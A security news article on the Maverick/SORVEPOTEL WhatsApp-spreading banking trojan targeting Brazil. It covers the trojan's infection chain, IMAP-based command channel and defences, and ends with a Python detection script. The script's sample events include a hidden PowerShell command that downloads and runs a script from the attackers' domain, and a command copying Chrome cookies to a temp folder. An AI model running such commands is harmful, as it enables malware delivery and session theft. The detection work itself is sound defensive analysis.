Maverick Trojan Spreading via WhatsApp Web Hijacks Accounts to Target Brazil
Researchers have uncovered a link between the well-known banking trojan Coyote and the newly identified malware Maverick, which had been propagating through WhatsApp. Analysts highlight striking overlaps in the use of the .NET platform, shared functionality, and infection techniques — all of which point to a common origin and a shared cybercriminal ecosystem operating in Brazil.
Maverick was first reported by Trend Micro, which associated it with the Water Saci threat group. The campaign consists of two primary components: the self-propagating SORVEPOTEL module, spread through the web version of WhatsApp, and a ZIP archive containing Maverick’s main executable, which deploys the malicious payload on the victim’s device. Sophos and Kaspersky later conducted independent analyses. Sophos suggested Maverick is an evolution of Coyote, while Kaspersky confirmed overlapping code fragments but classified Maverick as a distinct malware family designed for large-scale attacks targeting Brazilian users.
A new report from CyberProof reveals additional technical details of the infection chain. Inside the ZIP archive lies a Windows LNK shortcut. When executed, it invokes cmd.exe or PowerShell to download the initial stage from a remote server — referenced in the publication as zapgrande[.]com. The PowerShell script then deploys intermediary tools, disables Microsoft Defender, bypasses User Account Control (UAC), and downloads a .NET loader. The loader checks for analysis tools and exits if a debugger is detected, before retrieving both SORVEPOTEL and Maverick.
A notable feature is its geographic filtering: Maverick installs itself only after confirming that the compromised system is located in Brazil. The malware verifies timezone, interface language, regional settings, and date format. CyberProof also observed the same infrastructure being used in attacks on hotel networks, suggesting an expansion of the campaign’s target set.
As part of Water Saci’s updated tactics, described in detail by Trend Micro, the actors abandoned .NET binaries in favor of a combination of VBScript and PowerShell. This toolkit allows them to hijack WhatsApp Web sessions and distribute infected ZIP archives to a victim’s entire contact list. To automate the browser, the attackers download ChromeDriver and employ Selenium, enabling them to mimic user behavior, manipulate profiles, and send messages.
The compromise typically begins with unpacking a ZIP archive containing the obfuscated VBS loader Orcamento.vbs — also known as SORVEPOTEL. This VBScript executes a PowerShell command that loads and runs the tadeu.ps1 script directly in memory. The script then modifies the Chrome profile: it terminates active processes, copies cookies, authentication tokens, and saved sessions into temporary storage, thereby granting the malware access to WhatsApp Web without requiring a new QR-code scan.
Having seized control of the session, the script distributes malicious ZIP archives to all contacts, simultaneously receiving message templates from its C2 server. To conceal its activity, it displays a fake window labelled “WhatsApp Automation v6.0”, creating the illusion of a legitimate process. Before sending each message, PowerShell personalizes the greeting by inserting the contact’s name and adjusting it to the time of day; a dynamic “pause” signal allows operators to regulate activity in real time.
SORVEPOTEL uses an unusual communication channel: instead of standard HTTP, it relies on IMAP. The backdoor connects to a mailbox on terra.com[.]br with hard-coded credentials and reads commands from incoming emails. Some accounts are protected by MFA, forcing operators to manually enter authentication codes. This slows operations but significantly improves stealth. After retrieving a new C2 URL, the malware routinely polls it and executes any received instructions.
The command set covers the full spectrum of post-exploitation capabilities: system information collection (INFO), shell command execution via cmd.exe (CMD) or PowerShell (POWERSHELL), screenshot capture (SCREENSHOT), process listing (TASKLIST) and termination (KILL), and comprehensive file and directory operations (LIST_FILES, DOWNLOAD_FILE, UPLOAD_FILE, DELETE, RENAME, COPY, MOVE, FILE_INFO, SEARCH, CREATE_FOLDER). Additional functions include rebooting (REBOOT), shutting down (SHUTDOWN), self-updating (UPDATE), and checking the mailbox for new C2 addresses (CHECK_EMAIL).
The malware’s persistence and management framework also deserves attention: it uses multivector footholds within the system and a distributed C2 infrastructure. This enables operators to pause and resume the campaign at will, monitor compromised devices, and manage them as nodes in a botnet. According to Trend Micro, execution is limited to systems configured for the Portuguese language and region, minimizing detection outside the target zone.
The threat’s impact on Brazil is substantial: WhatsApp remains one of the country’s primary communication platforms, with more than 148 million active users. Mass distribution of ZIP archives via contact lists makes the campaign exceptionally contagious and inexpensive to conduct, especially given its use of stolen browser profiles to bypass authentication checks.
Experts recommend tightening controls on browser behavior and system scripting: monitor for unauthorized profile copying, block suspicious PowerShell and VBScript execution, restrict untrusted scripts through AppLocker or WDAC, and keep antivirus signatures up to date. It is also advisable to watch for unexpected activity on terra.com[.]br mailboxes and external domains such as zapgrande[.]com. Users should avoid opening ZIP files received in messages and remain alert to any unusual pop-ups in their browsers.
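To show what those recommendations look like as concrete detection logic, here is an added Python example (not code from CyberProof, Trend Micro, or any vendor cited above) that walks a handful of constructed Sysmon-style process-creation and network-connection events and flags the behaviours described in this article: a script host spawning PowerShell, Chrome profile data copied into a temp folder, PowerShell talking IMAP, and the loader and domain names named in the reports. The event shape, field names and sample values are assumptions.

```python
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
# Constructed Sysmon-style telemetry (not real logs): process-creation ("proc")
# and network-connection ("net") events from one host.
SAMPLE_EVENTS = [
    {"kind": "proc", "pid": 4100, "image": WSCRIPT, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\Orcamento.vbs"'},
    {"kind": "proc", "pid": 4120, "image": PS, "parent": WSCRIPT,
     "cmdline": "powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient)"
                ".DownloadString('http://zapgrande.com/tadeu.ps1'))"},
    {"kind": "proc", "pid": 4130, "image": PS, "parent": PS,
     "cmdline": r"powershell Copy-Item 'C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Cookies' "
                r"'C:\Users\u\AppData\Local\Temp\wa\Cookies'"},
    {"kind": "net", "pid": 4120, "image": PS, "dest_host": "imap.terra.com.br", "dest_port": 993},
]
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
KNOWN_SCRIPTS = ("orcamento.vbs", "tadeu.ps1")   # loader file names from the reports
KNOWN_C2 = ("zapgrande.com",)                    # staging domain from the reports
CHROME_PROFILE = re.compile(r"chrome\\user data", re.I)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def scan_events(events):
    """Return (rule, pid) pairs for events matching the SORVEPOTEL chain."""
    hits = []
    for ev in events:
        img = _base(ev["image"])
        if ev["kind"] == "proc":
            cmd = ev.get("cmdline", "").lower()
            if img in POWERSHELL and _base(ev.get("parent", "")) in SCRIPT_HOSTS:
                hits.append(("vbs_spawns_powershell", ev["pid"]))
            # cookies / session data copied out of the Chrome profile into a temp dir
            if img in POWERSHELL and CHROME_PROFILE.search(cmd) and TEMP_DIR.search(cmd):
                hits.append(("chrome_profile_copied_to_temp", ev["pid"]))
            if any(s in cmd for s in KNOWN_SCRIPTS):
                hits.append(("known_loader_name", ev["pid"]))
            if any(d in cmd for d in KNOWN_C2):
                hits.append(("known_c2_domain_in_cmdline", ev["pid"]))
        elif ev["kind"] == "net":
            # terra.com.br is a legitimate mail provider, so IMAP is only
            # suspicious here when the client process is PowerShell
            if img in POWERSHELL and ev["dest_port"] in (143, 993):
                hits.append(("powershell_imap_connection", ev["pid"]))
            if any(ev["dest_host"].endswith(d) for d in KNOWN_C2):
                hits.append(("known_c2_domain_connection", ev["pid"]))
    return hits
```

Run against SAMPLE_EVENTS the scanner returns six hits, one per rule that the constructed chain triggers; the IMAP rule fires only for the PowerShell process, not for a mail client.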
The correlation between Coyote and Maverick illustrates the continuing evolution of banking-trojan distribution tactics: attackers are shifting from conventional loaders to the exploitation of legitimate browser profiles and messaging platforms, thereby enhancing both stealth and operational efficiency. This shift demands that defenders refine their monitoring tools, expand automated analysis capabilities, and foster closer coordination between infrastructure operators and security vendors.